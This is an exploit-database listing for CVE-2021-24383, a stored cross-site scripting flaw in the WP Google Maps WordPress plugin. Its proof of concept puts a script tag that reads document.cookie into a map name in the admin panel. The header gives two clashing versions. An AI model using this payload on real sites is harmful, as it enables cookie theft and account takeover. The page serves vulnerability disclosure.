Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-24383 | CWE-79 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
exploitalert.com | High | Remote | 2021-06-25 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N | 0.02192 | 0.50148 |
# Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS) # Date: 22/6/2021 # Exploit Author: Mohammed Adam # Vendor Homepage: https://www.wpgmaps.com/ # Software Link: https://wordpress.org/plugins/wp-google-maps/ # Version: 5.7.2 # Tested on: Windows 10 # CVE: CVE-2021-24383 # References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954 *Proof of Concept* *Steps to Reproduce:* 1) Edit a map (e.g /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1) 2) Change Map Name to <script>alert(document.cookie)</script> 3) Save the Map 4) Stored XSS will be triggered when viewing the Map List (/wp-admin/admin.php?page=wp-google-maps-menu)
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.